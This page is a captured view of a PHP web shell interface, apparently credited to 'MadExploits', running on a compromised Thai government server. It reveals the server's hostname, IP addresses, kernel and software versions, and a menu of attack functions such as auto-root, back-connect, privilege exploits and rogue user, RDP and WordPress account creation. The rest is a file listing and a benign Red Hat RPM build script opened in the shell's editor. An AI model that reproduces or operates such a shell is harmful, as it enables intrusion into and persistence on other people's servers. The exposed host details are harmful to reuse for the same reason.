Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
rpm /
redhat /
[ HOME SHELL ]
Name
Size
Permission
Action
find-provides.d
[ DIR ]
drwxr-xr-x
brp-compress
1.42
KB
-rwxr-xr-x
brp-implant-ident-static
970
B
-rwxr-xr-x
brp-java-repack-jars
2.6
KB
-rwxr-xr-x
brp-python-hardlink
682
B
-rwxr-xr-x
brp-redhat
405
B
-rwxr-xr-x
brp-sparc64-linux
1.05
KB
-rwxr-xr-x
brp-strip
509
B
-rwxr-xr-x
brp-strip-comment-note
803
B
-rwxr-xr-x
brp-strip-shared
707
B
-rwxr-xr-x
brp-strip-static-archive
416
B
-rwxr-xr-x
config.guess
43.55
KB
-rwxr-xr-x
config.sub
31.96
KB
-rwxr-xr-x
dist.sh
1.92
KB
-rwxr-xr-x
find-provides
2.79
KB
-rwxr-xr-x
find-provides.ksyms
241
B
-rwxr-xr-x
find-provides.libtool
187
B
-rwxr-xr-x
find-provides.pkgconfig
603
B
-rwxr-xr-x
find-requires
4.05
KB
-rwxr-xr-x
find-requires.ksyms
4.44
KB
-rwxr-xr-x
find-requires.libtool
271
B
-rwxr-xr-x
find-requires.pkgconfig
257
B
-rwxr-xr-x
kmodtool
7.5
KB
-rwxr-xr-x
macros
8.66
KB
-rw-r--r--
perl.prov
4.73
KB
-rwxr-xr-x
perl.req
6.22
KB
-rwxr-xr-x
rpmrc
3.25
KB
-rw-r--r--
rpmsort
2.11
KB
-rwxr-xr-x
symset-table
903
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : brp-java-repack-jars
#!/bin/sh # If using normal root, avoid changing anything. if [ -z "$RPM_BUILD_ROOT" -o "$RPM_BUILD_ROOT" = "/" ]; then exit 0 fi # If zip is not installed, we can't repack the jars. if [ ! -x /usr/bin/zip ]; then exit 0 fi if [ ! -x /usr/bin/unzip ]; then exit 0 fi JARS=`find $RPM_BUILD_ROOT -type f -name \*.jar -not -size 0` if [ ! -z "$JARS" ]; then # make $RPM_BUILD_ROOT/tmp if it doesn't exist rmtmp=0 if [ ! -x "$RPM_BUILD_ROOT/tmp" ]; then mkdir -p $RPM_BUILD_ROOT/tmp rmtmp=1 fi # unpack every jar, set the date of the files and directories and # repack the jar for j in $JARS ; do JAROWN=`ls -l $j | cut -d' ' -f3` JARGRP=`ls -l $j | cut -d' ' -f4` JARNAME=`basename $j` JTMPDIR=`mktemp -d -p $RPM_BUILD_ROOT/tmp $JARNAME.tmpdir.XXXXXXXXXX` || exit 1 JARDIR=`mktemp -d -p $RPM_BUILD_ROOT/tmp $JARNAME.jardir.XXXXXXXXXX` || exit 1 TIMEREF=`mktemp -p $RPM_BUILD_ROOT/tmp $JARNAME.timeref.XXXXXXXXXX` || exit 1 pushd $JTMPDIR > /dev/null /usr/bin/unzip -qq -o $j find -type d -exec chmod a+rx,u+w {} \; find -type f -exec chmod a+r,u+w {} \; rm -f $j # Create the directories first. find -type d | LC_ALL=C sort | while read d; do mkdir -p "$JARDIR/$d" done # Get the modtime from the newest ChangeLog. If the project # doesn't have a ChangeLog, Jan 1, 1970 will be used. DATE="1970-01-01 UTC" if [ -z $_PACKAGE_BUILD_DIR ]; then _PACKAGE_BUILD_DIR=$RPM_BUILD_DIR/$RPM_PACKAGE_NAME-$RPM_PACKAGE_VERSION fi if [ -d $_PACKAGE_BUILD_DIR ]; then CHANGELOGS=`find $_PACKAGE_BUILD_DIR -type f -name ChangeLog` if [ ! -z "$CHANGELOGS" ]; then for c in $CHANGELOGS; do TMPDATE=`stat -c %y $c | cut -d " " -f 1-2` if [ `date --date="$TMPDATE" +%s` -gt `date --date="$DATE" +%s` ]; then DATE="$TMPDATE" fi done fi fi # move the contents over to the a new directory in order and set # the times. find -type f | LC_ALL=C sort | while read f; do cp "$f" "$JARDIR/$f" touch --date="$DATE" "$JARDIR/$f" done popd > /dev/null # Set the times of the directories. find $JARDIR -type d -print0 | xargs -0 touch --date="$DATE" # make the jar pushd $JARDIR > /dev/null if [ -n "`find -not -name '.'`" ]; then find * -not -name '.' | LC_ALL=C sort | /usr/bin/zip -q -X -9 $j -@ else # Put the empty jar back touch $j fi popd > /dev/null chown $JAROWN $j chgrp $JARGRP $j # Cleanup. rm -rf $JTMPDIR rm -rf $JARDIR rm -f $TIMEREF done # remove $RPM_BUILD_ROOT/tmp if we created it if [ $rmtmp -eq 1 ]; then rm -rf $RPM_BUILD_ROOT/tmp fi fi
Close